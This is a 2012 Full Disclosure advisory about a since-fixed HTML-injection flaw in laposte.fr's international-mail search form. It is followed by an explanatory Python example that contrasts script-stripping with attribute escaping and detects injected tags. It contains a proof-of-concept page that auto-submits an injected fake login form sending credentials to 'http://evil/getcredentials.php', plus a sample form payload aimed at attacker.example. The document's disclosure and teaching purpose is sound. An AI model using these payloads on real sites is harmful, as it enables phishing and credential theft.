Full Disclosure mailing list archives
XSS vulnerability on laposte.fr
From: Emmanuel FARCY <manu.farcy () gmail com>
Date: Wed, 5 Dec 2012 16:05:37 +0100
Website: laposte.fr
Version: -
Enterprise website: http://www.laposte.fr
Status: fixed
Level: Low

=========
Description
=========

La Poste is the main French postal service company.

=========
Details
=========

The search form in the international posting section is vulnerable to XSS:
http://www.laposte.fr/courrierinternational/index.php?id=416

Due to improper sanitization, the search field can be used for an XSS attack. JavaScript is correctly filtered, but HTML tags are not.

=========
Example
=========

A forged email can be sent with content like the following:

<html>
<form name="hahaha" method="post" action="http://www.laposte.fr/courrierinternational/index.php?id=416">
<input name="tx_indexedsearch[sword]" id="rechercheAv" value='"></form><br><br><form method="post" action="http://evil/getcredentials.php"><div class="formLog"><fieldset class="fieldsetForm"><legend>Veuillez Vous identifier</legend><label for="login" class="navCachee">Identifiant</label><input type="text" name="user" id="login" value="Email" class="inputSmall"/><br /><label for="password" class="navCachee">Mot de passe</label><input value="mot de passe" type="password"/><br /><input type="submit" id="ok" name="submit" value="Se connecter" class="buttonSmall" /></form><!--' class="input" type="hidden" />
</form>
<script>
document.hahaha.submit();
</script>
</html>

=========
Timeline
=========

09/10/2012: bug report with POC
02/11/2012: Vulnerability fixed after several emails because they didn't understand the risk (This is a POST parameter, how can I be vulnerable? The attacker must be behind the victim!)
05/12/2012: Advisory published

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
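The core defect described above is that the search term is reflected into an HTML attribute after only JavaScript (script blocks) has been filtered, so a quote and a closing bracket are enough to inject a form without any script. The following Python example is added here to illustrate that point from the defender's side; it is not code from the advisory or from laposte.fr. The template string, the two render functions and the sample search terms (including the `attacker.example` host) are constructed assumptions; the `tx_indexedsearch[sword]` field name comes from the advisory. It contrasts a naive "strip script tags" filter with context-appropriate attribute escaping, and uses a tag-counting check that a reviewer can run against any template to detect whether reflected input adds markup.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample inputs (not from the advisory).
BENIGN = "colis international"
SCRIPT_PAYLOAD = "x<script>alert(1)</script>"
# No JavaScript at all: closes the attribute and the input tag, then injects a form.
FORM_PAYLOAD = '"><form action="https://attacker.example/"><input name="user"></form><!--'

# Assumed server-side template reflecting the search term into an attribute value.
TEMPLATE = '<input name="tx_indexedsearch[sword]" value="{term}" type="text" />'


def render_naive(term: str) -> str:
    """Reflect the term after stripping only <script>...</script> blocks.

    This mimics the "JavaScript is filtered, HTML tags are not" situation: the
    filter recognises script but does nothing about quotes or other tags.
    """
    cleaned = re.sub(r"(?is)<script.*?>.*?</script>", "", term)
    return TEMPLATE.format(term=cleaned)


def render_escaped(term: str) -> str:
    """Reflect the term with escaping appropriate for an HTML attribute value.

    html.escape(quote=True) turns <, >, &, " and ' into entities, so the term can
    never terminate the attribute or open a new tag, whatever it contains.
    """
    return TEMPLATE.format(term=html.escape(term, quote=True))


class TagCounter(HTMLParser):
    """Collects the start tags the browser-like parser actually sees."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)


def tags_in(fragment: str) -> list[str]:
    """Return the start tags present in a rendered HTML fragment."""
    parser = TagCounter()
    parser.feed(fragment)
    parser.close()
    return parser.tags


def is_safe(render, term: str, expected_tags=("input",)) -> bool:
    """Detection check: reflecting a search term must never add tags.

    The template contributes exactly one <input>; any other tag in the output
    means the user-controlled term broke out of the attribute context.
    """
    return tuple(tags_in(render(term))) == tuple(expected_tags)


if __name__ == "__main__":
    for name, render in (("naive", render_naive), ("escaped", render_escaped)):
        for term in (BENIGN, SCRIPT_PAYLOAD, FORM_PAYLOAD):
            print(f"{name:8} safe={is_safe(render, term)!s:5} tags={tags_in(render(term))}")
```

Running the block shows the naive filter passing the script payload (the filter works for what it targets) while the form payload yields an extra `form` and `input` tag, i.e. an injected login form with no JavaScript involved; the escaped renderer yields only the template's own `input` for every term. The check is independent of the request method: whether the term arrives by GET or POST changes nothing about how the response is parsed, which is the misunderstanding noted in the timeline.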